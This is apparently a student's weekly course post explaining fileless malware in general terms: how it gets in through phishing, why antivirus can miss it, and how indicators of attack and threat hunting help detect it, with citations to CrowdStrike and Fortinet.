SH&NR Week 5 Posting - Fileless Malware

Fileless Malware

 Traditional malware is meant to downloaded and executed.  Fileless malware operates without files meaning that malicious code can be present and interact with programs without having to be downloaded or executed. Because of this difference, the prevention, detection, and response methods must also be different to effectively combat fileless malware. 

Fileless malware can get into a system the same way other malware can. An example would be a user clicking on a link in a suspicious phishing email. While anti-virus and anti-spyware software would be effective for traditional malware, fireless malware will not be stopped as easier. A regular antivirus program may not be able to identify the threat because there is no anomalous file associated with it (Fortinet). Combating fileless malware requires consistent monitoring. Crowdstrike and Fortinet recommend to monitor for indicators of attack (IOAs). IOAs are effective as they look for suspicious or malicious activity rather a file that has been downloaded like an anti-malware software would. Another method to detect fileless malware is to hire a third-party provider to handle threat hunting. Threat hunting can be very involved and time-intensive. Hiring the provider takes the stress of the user or organization. While threat detection differs, threat prevention should follow the same protocols as traditional malware. Fileless malware means scans should still look for any vulnerabilities relating to suspicious activity, but following malware mitigation best practices is still great choice. 

References:

Baker, K. (2024, November 26). What is fileless malware?. CrowdStrike. https://www.crowdstrike.com/en-us/cybersecurity-101/malware/fileless-malware/#:~:text=Unlike%20traditional%20malware%2C%20which%20typically,off%20the%20land%20(LOTL).

Fortinet. (n.d.-a). What is fileless malware? examples, detection and prevention. https://www.fortinet.com/resources/cyberglossary/fileless-malware#:~:text=Fileless%20malware%20is%20malicious%20code,computer%20instead%20of%20malicious%20files.